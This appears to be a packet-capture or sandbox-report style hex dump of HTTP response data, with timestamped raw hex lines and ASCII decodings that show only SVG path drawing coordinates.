36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c
                                                                                                                                                                                                                                                        Data Ascii: 2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M897.12,188.12a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5235INData Raw: 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 35 38 2c 32 38 34 2e 32 33 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35
                                                                                                                                                                                                                                                        Data Ascii: 11,0,0,1,.15,2.85"></path><path class="cls-4" d="M928.58,284.23a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.5
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5252INData Raw: 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                                                                                                        Data Ascii: .69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5268INData Raw: 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                                                                                                        Data Ascii: ,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5284INData Raw: 2e 35 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                        Data Ascii: .59a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5300INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 35 39 2c 32 32 37 2e 35 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c
                                                                                                                                                                                                                                                        Data Ascii: th><path class="cls-4" d="M959.59,227.54a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5316INData Raw: 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 30 36 2c 31 34 36 2e 35 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32
                                                                                                                                                                                                                                                        Data Ascii: 08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.06,146.54a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5332INData Raw: 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2c 32 35 36 2e 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c
                                                                                                                                                                                                                                                        Data Ascii: ,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912,256.5a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5348INData Raw: 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                        Data Ascii: ,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path cla
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5364INData Raw: 37 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: 7-2.2,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5380INData Raw: 2d 34 22 20 64 3d 22 4d 38 33 33 2e 35 36 2c 31 39 37 2e 36 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c
                                                                                                                                                                                                                                                        Data Ascii: -4" d="M833.56,197.63a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5396INData Raw: 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 31 36 2e 34 34 2c 33 30 37 2e 35 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32
                                                                                                                                                                                                                                                        Data Ascii: ></path><path class="cls-4" d="M816.44,307.58a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5412INData Raw: 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 35 2e 39 32 2c 32 32 36 2e 35 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c
                                                                                                                                                                                                                                                        Data Ascii: 8,0,0,1-.15-2.81"></path><path class="cls-4" d="M785.92,226.58a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5428INData Raw: 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22
                                                                                                                                                                                                                                                        Data Ascii: 81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5444INData Raw: 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 38 34 2c 31 35 38 2e 34 37 41 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2c 35 34 31 2c 31 36 31 61 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: 18,3.18"></path><path class="cls-7" d="M541.84,158.47A1.92,1.92,0,0,1,541,161a2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5460INData Raw: 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36
                                                                                                                                                                                                                                                        Data Ascii: ,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5476INData Raw: 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 34 36 2c 31 34 38 2e 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32
                                                                                                                                                                                                                                                        Data Ascii: 0,1,.17,3.18"></path><path class="cls-7" d="M596.46,148.9a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5492INData Raw: 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e
